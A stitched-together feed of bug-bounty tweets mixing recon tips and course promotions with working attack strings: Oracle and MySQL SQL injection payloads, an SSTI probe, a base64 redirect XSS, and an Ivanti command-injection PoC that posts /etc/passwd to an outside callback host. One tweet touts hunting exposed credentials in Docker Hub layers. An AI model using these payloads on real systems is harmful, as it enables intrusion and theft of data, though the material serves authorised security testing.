Using Nuclei to identify hostnames associated with an ASN using the PTR fingerprinting template!

⌨️ echo <ASN> | nuclei -id ptr-fingerprint

Use this to help you map a target's network structure and identify potential targets for further testing.

A new Executive Offense newsletter is out!

Episode #12 - The Training Landscape Pt. 1 (link 👇)

executiveoffense.beehiiv.com/p/cybersecurit…

Don't forget to subscribe!

SSTI to RCE in a private bug bounty program at HackerOne
Always use '><u>test{{7*7}} in every input , from {{7*7}} to $$$$

Let’s made something new
Let’s keep this tweet for question’s

You can ask me here in a comment and will answers in a comment , and let’s everyone learn and found some useful questions/answers

keep this tweet as reference by re-tweet

#bugbounty #bugbounty tips #questions ✌️

⚙️Extract URLs, paths, secrets, and other interesting bits from JavaScript !

created by Bishop Fox 🔥

github.com/BishopFox/jslu…

#bugbounty #bugbounty tip #bugbounty tips #ethicalhacking #hacking #infosec #pentesting #penetrationtesting #vdp

If you discover an oracle web app, you can use this payload

EHY01%27OR+1%3d1+AND+NVL(ASCII(SUBSTR((SELECT+chr(78)%7c%7cchr(69)%7c%7cchr(84)%7c%7cchr(83)%7c%7cchr(80) )%7c%7cchr(65)%7c%7cchr(82)%7c%7cchr(75)%7c%7cchr(69)%7c%7cchr(82)+FROM+DUAL)%2c9%2c1))%2c0) %3d82--
#BugBounty

3/ Ran:

$ curl https://██ -H 'Host: invalid12345.apps.███\.com'

Response:

> 404 Not Found: Requested route ('invalid12345.apps.███\.com') does not exist.

I brute-forced the host header with ffuf:

$ ffuf -u https://██ -H 'Host: FUZZ.apps.███\.com' -mc all -fw 9

#bugbountytips

SQL Injection is a P1 critical vulnerability and you will get $$$$ for reporting this.

Learn how to use SQLMap to find your first SQL Injection vulnerability in this thread 👇

MySQL Time-Based Injection Payloads List

#infosec #sqli #bugbounty

Do you have a blind error based SQL injection, which you cannot exploit further? If that's the case, here is my blog post titled 'Turning Blind Error Based SQL Injection Into An Exploitable Boolean One' which covers an additional technique to exploit. link.medium.com/rNOGW2mujHb

I just published How to exploit after finding an API KEY ? link.medium.com/9MuyOdhIhHb

#medium #bugbountytips #cybersecuritytips

I found a url like this :
domain.io/redirect?url=s…

encoded javascript:alert('Xss by vikas') to base64 like :
amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=

Now the new url is like this :
domain.io/redirect?url=a…

Which result in Reflected XSS:
#bugbounty #xss #infosec

Make sure to check whether the IVANTI targets are update🥳

Poc:
https :// [ivanti-ip/domain]/api/v1/license/keys-status/;curl -X POST -d @/etc/passwd oastify[.]xxxxx

I earned $4,100 for my submission on @bugcrowd bugcrowd.com/b1 #ItTakesACrowd #bugbountytips #BugBounty

Fares Yes, ***[email protected]' AND (SELECT 7854 FROM (SELECT(SLEEP(5)))pNME) AND 'WwEF'='WwEF&***_**=home

🕵️‍♂️ Inspired by @Godfatherorwa's GitHub recon methodology, I dug into Docker Hub layers & struck gold! 🪙 Bug bounty hunters, this is a treasure trove of exposed employee credentials! 🔍💰
(1/3)

Easy way to reveal server's full path:

Today I found a subdomain takeover in azure. I must say that the guide created by godiego is fantastic. Link: godiego.co/posts/STO-Azur… #BugBounty #bugbountytip

I am giving away 1 seat each for our upcoming bootcamps.

Azure Cloud Attacks (CARTP) - 3rd Feb (9:00 AM ET)

Active Directory Attacks (CRTP) - 4th Feb (9:00 AM ET)

Please Reply, Like and Repost to participate. The winners will be announced on Friday 2nd Feb 2024.